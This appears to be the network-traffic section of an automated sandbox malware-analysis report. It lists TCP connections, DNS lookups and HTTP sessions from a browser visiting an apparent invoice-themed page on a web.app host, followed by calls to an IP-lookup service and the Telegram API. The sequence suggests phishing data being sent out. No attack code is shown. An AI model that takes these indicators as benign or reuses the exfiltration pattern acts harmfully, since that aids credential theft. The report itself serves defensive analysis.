                                                        Mar 25, 2025 15:45:32.173228979 CET49715443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:32.173239946 CET44349715149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.173348904 CET49716443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:32.173362017 CET44349716149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.371139050 CET44349714104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:32.371226072 CET49714443192.168.2.7104.26.12.205
                                                        Mar 25, 2025 15:45:32.371913910 CET49714443192.168.2.7104.26.12.205
                                                        Mar 25, 2025 15:45:32.371920109 CET44349714104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:32.372235060 CET44349714104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:32.372580051 CET49714443192.168.2.7104.26.12.205
                                                        Mar 25, 2025 15:45:32.416265011 CET44349714104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:32.536240101 CET44349716149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.536319017 CET49716443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:32.538168907 CET49716443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:32.538181067 CET44349716149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.538408041 CET44349716149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.538742065 CET49716443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:32.540854931 CET44349715149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.540925980 CET49715443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:32.542238951 CET49715443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:32.542248011 CET44349715149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.542578936 CET44349715149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.542907953 CET49715443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:32.580272913 CET44349716149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.584269047 CET44349715149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.668140888 CET44349714104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:32.668323994 CET44349714104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:32.668401003 CET49714443192.168.2.7104.26.12.205
                                                        Mar 25, 2025 15:45:32.669707060 CET49714443192.168.2.7104.26.12.205
                                                        Mar 25, 2025 15:45:32.669720888 CET44349714104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:32.940793037 CET44349716149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.940875053 CET44349716149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.941103935 CET49716443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:32.962191105 CET44349715149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.962254047 CET44349715149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:32.962486029 CET49715443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.070684910 CET49715443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.070714951 CET44349715149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.071862936 CET49716443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.071868896 CET44349716149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.222245932 CET49719443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.222278118 CET44349719149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.222316027 CET49720443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.222352982 CET44349720149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.222362041 CET49719443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.222429037 CET49720443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.228018045 CET49720443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.228025913 CET44349720149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.228179932 CET49719443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.228193045 CET44349719149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.581696033 CET44349720149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.581782103 CET49720443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.582495928 CET49720443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.582500935 CET44349720149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.582693100 CET44349720149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.583086967 CET49720443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.589601994 CET44349719149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.589685917 CET49719443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.590256929 CET49719443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.590262890 CET44349719149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.590739012 CET44349719149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.591038942 CET49719443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:33.624294043 CET44349720149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.632268906 CET44349719149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:33.898360968 CET49671443192.168.2.7204.79.197.203
                                                        Mar 25, 2025 15:45:34.027600050 CET44349719149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:34.028044939 CET44349719149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:34.028150082 CET49719443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:34.029604912 CET49719443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:34.029624939 CET44349719149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:34.063827991 CET44349720149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:34.063885927 CET44349720149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:34.063941956 CET49720443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:34.064940929 CET49720443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:34.064950943 CET44349720149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:37.914458990 CET49678443192.168.2.720.189.173.15
                                                        Mar 25, 2025 15:45:38.227020979 CET49678443192.168.2.720.189.173.15
                                                        Mar 25, 2025 15:45:38.711611032 CET49671443192.168.2.7204.79.197.203
                                                        Mar 25, 2025 15:45:38.836386919 CET49678443192.168.2.720.189.173.15
                                                        Mar 25, 2025 15:45:40.039505005 CET49678443192.168.2.720.189.173.15
                                                        Mar 25, 2025 15:45:42.445291996 CET49678443192.168.2.720.189.173.15
                                                        Mar 25, 2025 15:45:46.836385965 CET49693443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:46.836448908 CET44349693142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:47.258479118 CET49678443192.168.2.720.189.173.15
                                                        Mar 25, 2025 15:45:48.320825100 CET49671443192.168.2.7204.79.197.203
                                                        Mar 25, 2025 15:45:55.335609913 CET49726443192.168.2.7104.26.13.205
                                                        Mar 25, 2025 15:45:55.335638046 CET44349726104.26.13.205192.168.2.7
                                                        Mar 25, 2025 15:45:55.335799932 CET49726443192.168.2.7104.26.13.205
                                                        Mar 25, 2025 15:45:55.335969925 CET49726443192.168.2.7104.26.13.205
                                                        Mar 25, 2025 15:45:55.335983992 CET44349726104.26.13.205192.168.2.7
                                                        Mar 25, 2025 15:45:55.553599119 CET44349726104.26.13.205192.168.2.7
                                                        Mar 25, 2025 15:45:55.554169893 CET49726443192.168.2.7104.26.13.205
                                                        Mar 25, 2025 15:45:55.554187059 CET44349726104.26.13.205192.168.2.7
                                                        Mar 25, 2025 15:45:55.554305077 CET49726443192.168.2.7104.26.13.205
                                                        Mar 25, 2025 15:45:55.554310083 CET44349726104.26.13.205192.168.2.7
                                                        Mar 25, 2025 15:45:55.817008972 CET44349726104.26.13.205192.168.2.7
                                                        Mar 25, 2025 15:45:55.817087889 CET44349726104.26.13.205192.168.2.7
                                                        Mar 25, 2025 15:45:55.817269087 CET49726443192.168.2.7104.26.13.205
                                                        Mar 25, 2025 15:45:55.926732063 CET49726443192.168.2.7104.26.13.205
                                                        Mar 25, 2025 15:45:55.926744938 CET44349726104.26.13.205192.168.2.7
                                                        Mar 25, 2025 15:45:56.145140886 CET49728443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.145194054 CET44349728149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.145258904 CET49728443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.146029949 CET49729443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.146066904 CET44349729149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.146122932 CET49729443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.146553993 CET49728443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.146567106 CET44349728149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.146651030 CET49729443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.146665096 CET44349729149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.152481079 CET49730443192.168.2.7104.26.12.205
                                                        Mar 25, 2025 15:45:56.152537107 CET44349730104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:56.152605057 CET49730443192.168.2.7104.26.12.205
                                                        Mar 25, 2025 15:45:56.152822018 CET49730443192.168.2.7104.26.12.205
                                                        Mar 25, 2025 15:45:56.152837038 CET44349730104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:56.371515036 CET44349730104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:56.371853113 CET49730443192.168.2.7104.26.12.205
                                                        Mar 25, 2025 15:45:56.371932030 CET44349730104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:56.372219086 CET49730443192.168.2.7104.26.12.205
                                                        Mar 25, 2025 15:45:56.372232914 CET44349730104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:56.499926090 CET44349728149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.500154972 CET49728443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.500181913 CET44349728149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.500325918 CET49728443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.500332117 CET44349728149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.500619888 CET44349729149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.500953913 CET49729443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.500983953 CET44349729149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.501096964 CET49729443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.501102924 CET44349729149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.867235899 CET49678443192.168.2.720.189.173.15
                                                        Mar 25, 2025 15:45:56.891935110 CET44349729149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.892115116 CET44349729149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.893740892 CET49729443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.894074917 CET49729443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.894092083 CET44349729149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.897533894 CET49731443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.897579908 CET44349731149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.897670031 CET49731443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.897865057 CET49731443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.897897005 CET44349731149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.919187069 CET44349728149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.919357061 CET44349728149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.920028925 CET49728443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.920352936 CET49728443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.920392990 CET44349728149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.923039913 CET49732443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.923074961 CET44349732149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:56.923137903 CET49732443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.923240900 CET49732443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:56.923250914 CET44349732149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:57.096272945 CET44349730104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:57.096339941 CET44349730104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:57.096494913 CET49730443192.168.2.7104.26.12.205
                                                        Mar 25, 2025 15:45:57.097449064 CET49730443192.168.2.7104.26.12.205
                                                        Mar 25, 2025 15:45:57.097465038 CET44349730104.26.12.205192.168.2.7
                                                        Mar 25, 2025 15:45:57.254142046 CET44349731149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:57.254448891 CET49731443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:57.254473925 CET44349731149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:57.254654884 CET49731443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:57.254658937 CET44349731149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:57.448957920 CET44349732149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:57.450206041 CET49732443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:57.450247049 CET44349732149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:57.450586081 CET49732443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:57.450591087 CET44349732149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:57.675302029 CET44349731149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:57.675431013 CET44349731149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:57.675767899 CET49731443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:57.677045107 CET49731443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:57.677062035 CET44349731149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:57.852164984 CET44349732149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:57.852247000 CET44349732149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:45:57.852303982 CET49732443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:57.853631973 CET49732443192.168.2.7149.154.167.220
                                                        Mar 25, 2025 15:45:57.853647947 CET44349732149.154.167.220192.168.2.7
                                                        Mar 25, 2025 15:46:00.415752888 CET49734443192.168.2.7142.251.40.164
                                                        Mar 25, 2025 15:46:00.415790081 CET44349734142.251.40.164192.168.2.7
                                                        Mar 25, 2025 15:46:00.415987968 CET49734443192.168.2.7142.251.40.164
                                                        Mar 25, 2025 15:46:00.416011095 CET49734443192.168.2.7142.251.40.164
                                                        Mar 25, 2025 15:46:00.416016102 CET44349734142.251.40.164192.168.2.7
                                                        Mar 25, 2025 15:46:00.630923986 CET44349734142.251.40.164192.168.2.7
                                                        Mar 25, 2025 15:46:00.631373882 CET49734443192.168.2.7142.251.40.164
                                                        Mar 25, 2025 15:46:00.631388903 CET44349734142.251.40.164192.168.2.7
                                                        Mar 25, 2025 15:46:02.994693995 CET49693443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:46:02.994860888 CET44349693142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:46:02.994975090 CET49693443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:46:10.646251917 CET44349734142.251.40.164192.168.2.7
                                                        Mar 25, 2025 15:46:10.646414995 CET44349734142.251.40.164192.168.2.7
                                                        Mar 25, 2025 15:46:10.646469116 CET49734443192.168.2.7142.251.40.164
                                                        Mar 25, 2025 15:46:10.994390965 CET49734443192.168.2.7142.251.40.164
                                                        Mar 25, 2025 15:46:10.994431019 CET44349734142.251.40.164192.168.2.7
                                                        Mar 25, 2025 15:46:14.630172968 CET4971080192.168.2.7142.250.81.227
                                                        Mar 25, 2025 15:46:14.728476048 CET8049710142.250.81.227192.168.2.7
                                                        Mar 25, 2025 15:46:14.728554010 CET4971080192.168.2.7142.250.81.227
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 25, 2025 15:44:56.384185076 CET53609111.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:44:56.885756016 CET53521851.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:44:57.582828045 CET53654761.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:00.353898048 CET6369153192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:00.354029894 CET6015153192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:00.459707022 CET53636911.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:00.459892035 CET53601511.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:01.514122009 CET5520953192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:01.514599085 CET6081853192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:01.617450953 CET53552091.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:01.617522955 CET53608181.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:05.078288078 CET5628053192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:05.078505993 CET5253753192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:05.078986883 CET5420853192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:05.079206944 CET5310053192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:05.185991049 CET53525371.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:05.186027050 CET53562801.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:05.206046104 CET53542081.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:05.206938028 CET53531001.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:06.821887970 CET5411053192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:06.822093964 CET5841053192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:06.925961971 CET53584101.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:06.927804947 CET53541101.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:07.014025927 CET53539251.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:08.115408897 CET5509153192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:08.115634918 CET6058753192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:08.221031904 CET53550911.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:08.222132921 CET53605871.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:14.618158102 CET53538851.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:31.411031961 CET6083753192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:31.411257029 CET5454553192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:31.516319990 CET53608371.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:31.519938946 CET53545451.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:32.027537107 CET5853253192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:32.027802944 CET6010953192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:32.030245066 CET6344053192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:32.030453920 CET5414153192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:32.138972044 CET53634401.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:32.139039993 CET53541411.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:32.143301010 CET53585321.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:32.370173931 CET53601091.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:33.083595037 CET6313053192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:33.083802938 CET6002953192.168.2.71.1.1.1
                                                        Mar 25, 2025 15:45:33.190284014 CET53631301.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:33.228075027 CET53600291.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:33.616385937 CET53635981.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:55.778199911 CET53501571.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:56.300978899 CET53544001.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:45:58.819302082 CET53510251.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:46:14.558919907 CET53567771.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:46:15.079282045 CET53505561.1.1.1192.168.2.7
                                                        Mar 25, 2025 15:46:34.663646936 CET138138192.168.2.7192.168.2.255
                                                        TimestampSource IPDest IPChecksumCodeType
                                                        Mar 25, 2025 15:45:32.370328903 CET192.168.2.71.1.1.1c238(Port unreachable)Destination Unreachable
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Mar 25, 2025 15:45:00.353898048 CET192.168.2.71.1.1.10xae8eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:00.354029894 CET192.168.2.71.1.1.10xbea4Standard query (0)www.google.com65IN (0x0001)false
                                                        Mar 25, 2025 15:45:01.514122009 CET192.168.2.71.1.1.10xc004Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:01.514599085 CET192.168.2.71.1.1.10xd740Standard query (0)drive.usercontent.google.com65IN (0x0001)false
                                                        Mar 25, 2025 15:45:05.078288078 CET192.168.2.71.1.1.10xebfeStandard query (0)cdn.tailwindcss.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:05.078505993 CET192.168.2.71.1.1.10x9281Standard query (0)cdn.tailwindcss.com65IN (0x0001)false
                                                        Mar 25, 2025 15:45:05.078986883 CET192.168.2.71.1.1.10xb3f3Standard query (0)facture-75823.web.appA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:05.079206944 CET192.168.2.71.1.1.10x3ca4Standard query (0)facture-75823.web.app65IN (0x0001)false
                                                        Mar 25, 2025 15:45:06.821887970 CET192.168.2.71.1.1.10x9564Standard query (0)i.ibb.coA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:06.822093964 CET192.168.2.71.1.1.10x1091Standard query (0)i.ibb.co65IN (0x0001)false
                                                        Mar 25, 2025 15:45:08.115408897 CET192.168.2.71.1.1.10xf0ffStandard query (0)i.ibb.coA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:08.115634918 CET192.168.2.71.1.1.10xafcaStandard query (0)i.ibb.co65IN (0x0001)false
                                                        Mar 25, 2025 15:45:31.411031961 CET192.168.2.71.1.1.10x8543Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:31.411257029 CET192.168.2.71.1.1.10x7941Standard query (0)api.ipify.org65IN (0x0001)false
                                                        Mar 25, 2025 15:45:32.027537107 CET192.168.2.71.1.1.10xddb5Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:32.027802944 CET192.168.2.71.1.1.10x1fb4Standard query (0)api.telegram.org65IN (0x0001)false
                                                        Mar 25, 2025 15:45:32.030245066 CET192.168.2.71.1.1.10xb1eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:32.030453920 CET192.168.2.71.1.1.10x771Standard query (0)api.ipify.org65IN (0x0001)false
                                                        Mar 25, 2025 15:45:33.083595037 CET192.168.2.71.1.1.10x3ca3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:33.083802938 CET192.168.2.71.1.1.10x18b3Standard query (0)api.telegram.org65IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Mar 25, 2025 15:45:00.459707022 CET1.1.1.1192.168.2.70xae8eNo error (0)www.google.com142.251.40.164A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:00.459892035 CET1.1.1.1192.168.2.70xbea4No error (0)www.google.com65IN (0x0001)false
                                                        Mar 25, 2025 15:45:01.617450953 CET1.1.1.1192.168.2.70xc004No error (0)drive.usercontent.google.com142.250.80.33A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:05.185991049 CET1.1.1.1192.168.2.70x9281No error (0)cdn.tailwindcss.com65IN (0x0001)false
                                                        Mar 25, 2025 15:45:05.186027050 CET1.1.1.1192.168.2.70xebfeNo error (0)cdn.tailwindcss.com172.67.41.16A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:05.186027050 CET1.1.1.1192.168.2.70xebfeNo error (0)cdn.tailwindcss.com104.22.20.144A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:05.186027050 CET1.1.1.1192.168.2.70xebfeNo error (0)cdn.tailwindcss.com104.22.21.144A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:05.206046104 CET1.1.1.1192.168.2.70xb3f3No error (0)facture-75823.web.app199.36.158.100A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:06.927804947 CET1.1.1.1192.168.2.70x9564No error (0)i.ibb.co207.174.26.219A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:08.221031904 CET1.1.1.1192.168.2.70xf0ffNo error (0)i.ibb.co207.174.26.219A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:31.516319990 CET1.1.1.1192.168.2.70x8543No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:31.516319990 CET1.1.1.1192.168.2.70x8543No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:31.516319990 CET1.1.1.1192.168.2.70x8543No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:31.519938946 CET1.1.1.1192.168.2.70x7941No error (0)api.ipify.org65IN (0x0001)false
                                                        Mar 25, 2025 15:45:32.138972044 CET1.1.1.1192.168.2.70xb1eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:32.138972044 CET1.1.1.1192.168.2.70xb1eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:32.138972044 CET1.1.1.1192.168.2.70xb1eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:32.139039993 CET1.1.1.1192.168.2.70x771No error (0)api.ipify.org65IN (0x0001)false
                                                        Mar 25, 2025 15:45:32.143301010 CET1.1.1.1192.168.2.70xddb5No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 15:45:33.190284014 CET1.1.1.1192.168.2.70x3ca3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                        • drive.usercontent.google.com
                                                        • cdn.tailwindcss.com
                                                        • facture-75823.web.app
                                                          • i.ibb.co
                                                        • api.ipify.org
                                                        • api.telegram.org
                                                        • c.pki.goog
                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.749710142.250.81.22780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 25, 2025 15:45:14.118500948 CET202OUTGET /r/gsr1.crl HTTP/1.1
                                                        Cache-Control: max-age = 3000
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                                        User-Agent: Microsoft-CryptoAPI/10.0
                                                        Host: c.pki.goog
                                                        Mar 25, 2025 15:45:14.214545012 CET222INHTTP/1.1 304 Not Modified
                                                        Date: Tue, 25 Mar 2025 14:39:48 GMT
                                                        Expires: Tue, 25 Mar 2025 15:29:48 GMT
                                                        Age: 326
                                                        Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                                        Cache-Control: public, max-age=3000
                                                        Vary: Accept-Encoding
                                                        Mar 25, 2025 15:45:14.218972921 CET200OUTGET /r/r4.crl HTTP/1.1
                                                        Cache-Control: max-age = 3000
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                        User-Agent: Microsoft-CryptoAPI/10.0
                                                        Host: c.pki.goog
                                                        Mar 25, 2025 15:45:14.318947077 CET222INHTTP/1.1 304 Not Modified
                                                        Date: Tue, 25 Mar 2025 14:30:24 GMT
                                                        Expires: Tue, 25 Mar 2025 15:20:24 GMT
                                                        Age: 890
                                                        Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                        Cache-Control: public, max-age=3000
                                                        Vary: Accept-Encoding


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.749692142.250.80.334432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
